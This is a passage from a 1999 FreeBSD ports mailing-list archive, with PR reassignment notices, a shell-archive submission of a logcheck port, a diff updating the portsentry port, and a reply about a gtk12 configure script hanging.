Responsible-Changed-When: Tue Dec 14 21:32:39 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9B1D1549E; Tue, 14 Dec 1999 21:32:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA58945; Tue, 14 Dec 1999 21:32:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:32:53 -0800 (PST) From: Message-Id: <199912150532.VAA58945@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12835: New port: libcgic-1.06 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: libcgic-1.06 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:32:39 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DA4A154FA; Tue, 14 Dec 1999 21:33:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59047; Tue, 14 Dec 1999 21:33:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:33:15 -0800 (PST) From: Message-Id: <199912150533.VAA59047@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13173: New port: yiff-0.33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: yiff-0.33 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:02 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DA4A154FA; Tue, 14 Dec 1999 21:33:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59047; Tue, 14 Dec 1999 21:33:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:33:15 -0800 (PST) From: Message-Id: <199912150533.VAA59047@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13173: New port: yiff-0.33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: yiff-0.33 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:02 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EE5EC1555C; Tue, 14 Dec 1999 21:33:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59127; Tue, 14 Dec 1999 21:33:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:33:48 -0800 (PST) From: Message-Id: <199912150533.VAA59127@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13191: New port: fire-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: fire-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:21 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:33:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EE5EC1555C; Tue, 14 Dec 1999 21:33:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59127; Tue, 14 Dec 1999 21:33:48 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:33:48 -0800 (PST) From: Message-Id: <199912150533.VAA59127@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13191: New port: fire-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: fire-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:21 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:34: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A8961545A; Tue, 14 Dec 1999 21:34:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59245; Tue, 14 Dec 1999 21:34:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:34:06 -0800 (PST) From: Message-Id: <199912150534.VAA59245@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13251: New port: founts-11 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: founts-11 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:55 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:34: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A8961545A; Tue, 14 Dec 1999 21:34:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59245; Tue, 14 Dec 1999 21:34:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:34:06 -0800 (PST) From: Message-Id: <199912150534.VAA59245@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13251: New port: founts-11 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: founts-11 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:33:55 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:34:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED40C1551D; Tue, 14 Dec 1999 21:34:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59346; Tue, 14 Dec 1999 21:34:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:34:28 -0800 (PST) From: Message-Id: <199912150534.VAA59346@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13267: New port: glasteroids-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: glasteroids-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:34:14 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:34:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED40C1551D; Tue, 14 Dec 1999 21:34:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59346; Tue, 14 Dec 1999 21:34:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:34:28 -0800 (PST) From: Message-Id: <199912150534.VAA59346@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13267: New port: glasteroids-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: glasteroids-1.0 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:34:14 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:35: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 321D6155B6; Tue, 14 Dec 1999 21:35:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59510; Tue, 14 Dec 1999 21:35:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:35:03 -0800 (PST) From: Message-Id: <199912150535.VAA59510@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13291: New port: xap-xwf-0.7.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xap-xwf-0.7.8 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:34:48 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:35: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 321D6155B6; Tue, 14 Dec 1999 21:35:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59510; Tue, 14 Dec 1999 21:35:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:35:03 -0800 (PST) From: Message-Id: <199912150535.VAA59510@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13291: New port: xap-xwf-0.7.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xap-xwf-0.7.8 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:34:48 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:35:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 89A9215488; Tue, 14 Dec 1999 21:35:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59581; Tue, 14 Dec 1999 21:35:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:35:19 -0800 (PST) From: Message-Id: <199912150535.VAA59581@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13541: New port: chpp-0.3.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: chpp-0.3.5 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:35:07 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 21:35:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 89A9215488; Tue, 14 Dec 1999 21:35:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA59581; Tue, 14 Dec 1999 21:35:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Tue, 14 Dec 1999 21:35:19 -0800 (PST) From: Message-Id: <199912150535.VAA59581@freefall.freebsd.org> To: steve@FreeBSD.org, ports@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13541: New port: chpp-0.3.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: chpp-0.3.5 Responsible-Changed-From-To: ports->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Tue Dec 14 21:35:07 PST 1999 Responsible-Changed-Why: Use freebsd-ports instead of ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 22:40: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7B0C815321 for ; Tue, 14 Dec 1999 22:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA64857; Tue, 14 Dec 1999 22:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 22:40:03 -0800 (PST) Message-Id: <199912150640.WAA64857@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Dan Langille" Subject: Re: ports/15360: new port = logcheck Reply-To: "Dan Langille" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15360; it has been noted by GNATS. From: "Dan Langille" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15360: new port = logcheck Date: Wed, 15 Dec 1999 19:34:30 +1300 Please ignore my previous submission. Use this one instead. A few errors have been pointed out to me off-list. Thanks. # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # logcheck # logcheck/Makefile # logcheck/files # logcheck/files/md5 # logcheck/patches # logcheck/patches/patch-aa # logcheck/pkg # logcheck/pkg/COMMENT # logcheck/pkg/DESCR # logcheck/pkg/PLIST # logcheck/shar.txt # echo c - logcheck mkdir -p logcheck > /dev/null 2>&1 echo x - logcheck/Makefile sed 's/^X//' >logcheck/Makefile << 'END-of-logcheck/Makefile' X# Ports collection makefile for: logcheck X# Version required: 1.1.1 X# Date created: 9 December 1999 X# Whom: Dan Langille X# X# $FreeBSD$ X# X XDISTNAME= logcheck-1.1.1 XCATEGORIES= security XMASTER_SITES= http://www.psionic.com/tools/ X XMAINTAINER= ports@freebsddiary.org X Xpost-install: X @${ECHO_MSG} " " X @${ECHO_MSG} "---------------------------------------------------------------" X @${ECHO_MSG} " Remember to copy the sample files to the real file names." X @${ECHO_MSG} " here is an example what you need to do" X @${ECHO_MSG} " " X @${ECHO_MSG} " cd ${PREFIX}/etc/" X @${ECHO_MSG} " cp logcheck.ignore.sample logcheck.ignore" X @${ECHO_MSG} " cp logcheck.violations.ignore.sample logcheck.violations.ignore" X @${ECHO_MSG} " cp logcheck.violations.sample logcheck.violations" X @${ECHO_MSG} " cp logcheck.hacking.sample logcheck.hacking" X @${ECHO_MSG} " " X @${ECHO_MSG} " Note that logcheck is started with ./logcheck.sh" X @${ECHO_MSG} "---------------------------------------------------------------" X X.include END-of-logcheck/Makefile echo c - logcheck/files mkdir -p logcheck/files > /dev/null 2>&1 echo x - logcheck/files/md5 sed 's/^X//' >logcheck/files/md5 << 'END-of-logcheck/files/md5' XMD5 (logcheck-1.1.1.tar.gz) = e97c2f096e219e20310c1b80e9e1bc29 END-of-logcheck/files/md5 echo c - logcheck/patches mkdir -p logcheck/patches > /dev/null 2>&1 echo x - logcheck/patches/patch-aa sed 's/^X//' >logcheck/patches/patch-aa << 'END-of-logcheck/patches/patch-aa' X--- Makefile.orig Mon Nov 1 04:07:29 1999 X+++ Makefile Wed Dec 15 18:41:13 1999 X@@ -5,6 +5,8 @@ X # Thanks to rbulling@obscure.org for cleaning this Makefile up.. X # X X+SYSTYPE=freebsd X+ X # Generic compiler X CC = cc X # GNU.. X@@ -35,19 +37,19 @@ X # Debug mode for logtail X # CFLAGS = -g -DDEBUG X X-all: X- @echo "Usage: make " X- @echo " is one of: " X- @echo " linux, bsdos, freebsd, sun, generic, hpux, digital" X- @echo "" X- @echo "NOTE: This will make and install the package in these" X- @echo " directories:" X- @echo " logcheck configuration files : $(INSTALLDIR)" X- @echo " logcheck.sh shell script : $(INSTALLDIR_SH)" X- @echo " logtail program : $(INSTALLDIR_BIN)" X- @echo "" X- @echo "Edit the makefile if you wish to change these paths." X- @echo "Any existing files will be overwritten." X+all: build X+# @echo "Usage: make " X+# @echo " is one of: " X+# @echo " linux, bsdos, freebsd, sun, generic, hpux, digital" X+# @echo "" X+# @echo "NOTE: This will make and install the package in these" X+# @echo " directories:" X+# @echo " logcheck configuration files : $(INSTALLDIR)" X+# @echo " logcheck.sh shell script : $(INSTALLDIR_SH)" X+# @echo " logtail program : $(INSTALLDIR_BIN)" X+# @echo "" X+# @echo "Edit the makefile if you wish to change these paths." X+# @echo "Any existing files will be overwritten." X X clean: X /bin/rm ./src/logtail ./src/logtail.o X@@ -60,27 +62,29 @@ X /bin/rm $(INSTALLDIR)/logcheck.violations.ignore X /bin/rm $(INSTALLDIR_BIN)/logtail X X-install: X+build: X @echo "Making $(SYSTYPE)" X $(CC) $(CFLAGS) -o ./src/logtail ./src/logtail.c X+ X+install: X @echo "Creating temp directory $(TMPDIR)" X @if [ ! -d $(TMPDIR) ]; then /bin/mkdir $(TMPDIR); fi X @echo "Setting temp directory permissions" X chmod 700 $(TMPDIR) X @echo "Copying files" X- cp ./systems/$(SYSTYPE)/logcheck.hacking $(INSTALLDIR) X- cp ./systems/$(SYSTYPE)/logcheck.violations $(INSTALLDIR) X- cp ./systems/$(SYSTYPE)/logcheck.violations.ignore $(INSTALLDIR) X- cp ./systems/$(SYSTYPE)/logcheck.ignore $(INSTALLDIR) X- cp ./systems/$(SYSTYPE)/logcheck.sh $(INSTALLDIR_SH) X+ cp ./systems/$(SYSTYPE)/logcheck.hacking $(INSTALLDIR)/logcheck.hacking.sample X+ cp ./systems/$(SYSTYPE)/logcheck.violations $(INSTALLDIR)/logcheck.violations.sample X+ cp ./systems/$(SYSTYPE)/logcheck.violations.ignore $(INSTALLDIR)/logcheck.violations.ignore.samp le X+ cp ./systems/$(SYSTYPE)/logcheck.ignore $(INSTALLDIR)/logcheck.ignore.sample X+ cp ./systems/$(SYSTYPE)/logcheck.sh $(INSTALLDIR_SH)/logcheck.sh X cp ./src/logtail $(INSTALLDIR_BIN) X @echo "Setting permissions" X chmod 700 $(INSTALLDIR_SH)/logcheck.sh X chmod 700 $(INSTALLDIR_BIN)/logtail X- chmod 600 $(INSTALLDIR)/logcheck.violations.ignore X- chmod 600 $(INSTALLDIR)/logcheck.violations X- chmod 600 $(INSTALLDIR)/logcheck.hacking X- chmod 600 $(INSTALLDIR)/logcheck.ignore X+ chmod 600 $(INSTALLDIR)/logcheck.violations.ignore.sample X+ chmod 600 $(INSTALLDIR)/logcheck.violations.sample X+ chmod 600 $(INSTALLDIR)/logcheck.hacking.sample X+ chmod 600 $(INSTALLDIR)/logcheck.ignore.sample X @echo "Done. Don't forget to set your crontab." X X generic: END-of-logcheck/patches/patch-aa echo c - logcheck/pkg mkdir -p logcheck/pkg > /dev/null 2>&1 echo x - logcheck/pkg/COMMENT sed 's/^X//' >logcheck/pkg/COMMENT << 'END-of-logcheck/pkg/COMMENT' XAuditing tool for system logs on Unix boxes. END-of-logcheck/pkg/COMMENT echo x - logcheck/pkg/DESCR sed 's/^X//' >logcheck/pkg/DESCR << 'END-of-logcheck/pkg/DESCR' XLogcheck helps spot problems and security violations in your logfiles Xautomatically and will send the results to you in e-mail. X XLogcheck is part of the Abacus Project of security tools. It is a program Xcreated to help in the processing of UNIX system logfiles generated by the Xvarious Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper Xand Log Daemon packages, and the Firewall Toolkit(c) by Trusted Information XSystems Inc.(TIS). Logcheck also works very well at reporting on other Xcommon operating system security violations and strange events. X XWWW: http://www.psionic.com/ X X- Dan Langille Xdan@freebsddiary.org END-of-logcheck/pkg/DESCR echo x - logcheck/pkg/PLIST sed 's/^X//' >logcheck/pkg/PLIST << 'END-of-logcheck/pkg/PLIST' Xetc/logcheck.hacking.sample Xetc/logcheck.violations.sample Xetc/logcheck.violations.ignore.sample Xetc/logcheck.ignore.sample Xetc/logcheck.sh Xbin/logtail END-of-logcheck/pkg/PLIST echo x - logcheck/shar.txt sed 's/^X//' >logcheck/shar.txt << 'END-of-logcheck/shar.txt' END-of-logcheck/shar.txt exit -- Dan Langille - DVL Software Limited [I'm looking for more work] The FreeBSD Diary - http://www.freebsddiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm unix @ home - http://www.unixathome.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 14 23: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6136215321 for ; Tue, 14 Dec 1999 23:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA66325; Tue, 14 Dec 1999 23:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A8535151BC; Tue, 14 Dec 1999 22:59:48 -0800 (PST) Message-Id: <19991215065948.A8535151BC@hub.freebsd.org> Date: Tue, 14 Dec 1999 22:59:48 -0800 (PST) From: dan@freebsddiary.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15490: update portsentry to use latest version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15490 >Category: ports >Synopsis: update portsentry to use latest version >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 23:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dan Langille >Release: .3-19991207-SNAP >Organization: The FreeBSD Diary >Environment: FreeBSD fred.int.nz.freebsd.org 3.3-19991207-SNAP FreeBSD 3.3-19991207-SNAP #0: Wed Dec 15 01:52:51 NZDT 1999 root@fred.int.nz.freebsd.org:/usr/src/sys/compile/FRED33S i386 >Description: I tried to contact the original port creator at chris@still.whet.org but mail was not delivered. This diff updates the port to use PortSentry 1.0 instead of 0.90 >How-To-Repeat: >Fix: Only in portsentry.new: CVS diff -r -u portsentry.new/Makefile portsentry/Makefile --- portsentry.new/Makefile Thu Dec 9 13:46:56 1999 +++ portsentry/Makefile Tue Aug 31 13:51:37 1999 @@ -1,12 +1,12 @@ -# Ports collection makefile for: sentry -# Version required: 1.0 +# New ports collection makefile for: sentry +# Version required: 0.90 # Date created: 3 January 1998 # Whom: chris@still.whet.org # -# $Id: Makefile,v 1.4 1999/05/17 05:21:17 mharo Exp $ +# $FreeBSD: ports/security/portsentry/Makefile,v 1.5 1999/08/31 01:51:37 peter Exp $ # -DISTNAME= portsentry-1.0 +DISTNAME= portsentry-0.90 CATEGORIES= security MASTER_SITES= http://www.psionic.com/tools/ Only in portsentry.new: Makefile.org Only in portsentry.new: README.html Only in portsentry.new/files: CVS diff -r -u portsentry.new/files/md5 portsentry/files/md5 --- portsentry.new/files/md5 Wed Dec 15 19:36:05 1999 +++ portsentry/files/md5 Mon May 17 17:21:19 1999 @@ -1 +1 @@ -MD5 (portsentry-1.0.tar.gz) = d2d29e614f1604bd62a23e33d7a7564f +MD5 (portsentry-0.90.tar.gz) = 80eead64b3d6efb10748b80ecec0f54a Only in portsentry.new/patches: CVS diff -r -u portsentry.new/pkg/COMMENT portsentry/pkg/COMMENT --- portsentry.new/pkg/COMMENT Thu Dec 9 13:47:43 1999 +++ portsentry/pkg/COMMENT Sun Dec 20 05:53:20 1998 @@ -1 +1 @@ -Port scan detection and active defensively +Port scan detection and active defense Only in portsentry.new/pkg: CVS >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 0: 9: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from lamb.sas.com (lamb.sas.com [192.35.83.8]) by hub.freebsd.org (Postfix) with ESMTP id 906681546E; Wed, 15 Dec 1999 00:08:52 -0800 (PST) (envelope-from jwd@unx.sas.com) Received: from mozart (mozart.unx.sas.com [192.58.184.28]) by lamb.sas.com (8.9.3/8.9.1) with SMTP id DAA16919; Wed, 15 Dec 1999 03:08:45 -0500 (EST) Received: from bb01f39.unx.sas.com by mozart (5.65c/SAS/Domains/5-6-90) id AA25507; Wed, 15 Dec 1999 03:08:15 -0500 Received: (from jwd@localhost) by bb01f39.unx.sas.com (8.9.1/8.9.1) id DAA43762; Wed, 15 Dec 1999 03:08:15 -0500 (EST) (envelope-from jwd) From: "John W. DeBoskey" Message-Id: <199912150808.DAA43762@bb01f39.unx.sas.com> Subject: Re: configure problems gtk12-port To: ports@freebsd.org Date: Wed, 15 Dec 1999 03:08:15 -0500 (EST) Cc: obrien@freebsd.org, daeron@Wit401305.student.utwente.nl X-Mailer: ELM [version 2.4ME+ PL43 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I debugged this problem for a friend at work. gtk12 configure creates a 'c' program conftest.c which contains the line: system("touch filename"); where I don't remember what filename is offhand. Running as root, the system call hangs forever. Running as a non-priv user, the touch command fails and system returns (but the return code is not checked). I have to wonder whether or not signals are being dealt with correctly and the following snippet from system.c: default: /* parent */ do { pid = waitpid(pid, &pstat, 0); } while (pid == -1 && errno == EINTR); break; The program did not respond to keyboard kill, quit, or intr signals either. Backgrounding it and kill -9 did the trick. Hope the above helps. Later, John > On Tue, Dec 14, 1999 at 05:00:14PM +0100, Pascal Hofstee wrote: > > I have noticed some weird problems lately when running configure-scripts. > > E.g. when trying to build the gtk12-port configure just hangs waiting for > > Please repost this in ports@freebsd.org as that is the proper list for > ports-related questions (which this is). > > freebsd-current@freebsd.org is for issues surounding the bleading edge > development in the base system. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 7:40: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org 